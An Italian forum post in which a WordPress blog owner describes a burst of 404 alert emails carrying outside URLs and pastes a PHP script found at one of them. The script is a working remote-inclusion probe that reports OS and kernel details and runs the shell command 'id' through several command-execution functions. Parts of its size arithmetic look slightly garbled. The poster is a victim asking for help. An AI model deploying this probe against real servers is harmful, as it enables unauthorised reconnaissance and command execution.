- Home
- Categorie
- Coding e Sistemistica
- WordPress
- Email avviso pagina non trovata a raffica
-
Email avviso pagina non trovata a raffica
Ciao a tutti,
ho da poco un blog su wordpress all' indirizzo http://www.nemoprincess.it/wordpress. E ho anche l' avviso via mail quando qualcuno raggiunge una pagina non trovata. Da qualche ora ho ricevuto un centinaio di mail stranissime per questi avvisi. L' url non raggiungibile spesso inizia con quello del mio blog e termina con l' indirizzo di strani siti. Inoltre molte altre mail indicano come non trovati file invece raggiungibili. Cosa potrebbe essere successo? C'è qualcuno a cui è capitata la stessa cosa?Aggiungo che seguendo uno degli indirizzi ho trovato questo file di testo:
<?$dir = @getcwd();$ker = @php_uname();echo "31337<br>";$OS = @PHP_OS;echo "<br>OSTYPE:$OS<br>";echo "<br>Kernel:$ker<br>";$free = disk_free_space($dir); if ($free === FALSE) {$free = 0;} if ($free < 0) {$free = 0;} echo "Free:".view_size($free)."<br>"; $cmd="id";$eseguicmd=ex($cmd);echo $eseguicmd;function ex($cfe){$res = '';if (!empty($cfe)){if(function_exists('exec')){@exec($cfe,$res);$res = join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cfe);}elseif(function_exists('system')){@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}function view_size($size) { if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; }}Attacco???